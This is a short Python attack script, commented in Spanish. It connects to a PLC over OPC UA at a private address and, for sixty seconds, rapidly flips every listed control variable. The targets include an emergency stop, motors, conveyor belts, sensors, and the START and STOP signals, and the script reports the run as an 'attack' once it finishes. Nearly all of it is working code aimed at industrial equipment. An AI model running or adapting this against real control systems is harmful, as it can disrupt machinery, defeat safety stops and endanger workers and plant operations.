from opcua import Client
import time

# Configuración
PLC_ENDPOINT = "opc.tcp://10.10.10.53:4840"
VARIABLES = [
    "ACIL_STOP", "DONER_MOTOR_1", "DONER_MOTOR_2", "DONER_MOTOR_3",
    "GRI_BANT", "GRI_SENSOR", "MAVI_BANT", "MAVI_SENSOR",
    "MOTOR_1", "MOTOR_3", "MOTOR_4", "MOTOR_5", "MOTOR_6",
    "SISTEM", "START", "STOP",
    "YAN_DONER_1", "YAN_DONER_2", "YAN_DONER_3",
    "YESIL_BANT", "YESIL_SENSOR"
]

DURATION = 60      # segundos
FREQ = 0.01        # intervalo entre cambios

start_time = time.time()

try:
    client = Client(PLC_ENDPOINT)
    client.connect()
    print("[✔] Conexión establecida con el PLC en", PLC_ENDPOINT)

    while time.time() - start_time < DURATION:
        for var in VARIABLES:
            try:
                node = client.get_node(f"ns=4;s=|var|{var}")
                current = node.get_value()
                node.set_value(not current)
                time.sleep(FREQ)
            except:
                pass

    elapsed = round(time.time() - start_time, 2)
    print(f"[✔] Ataque completado. Duración: {elapsed} segundos.")

except Exception as e:
    print(f"[✘] No se pudo conectar al PLC en {PLC_ENDPOINT}: {e}")

finally:
    try:
        client.disconnect()
    except:
        pass

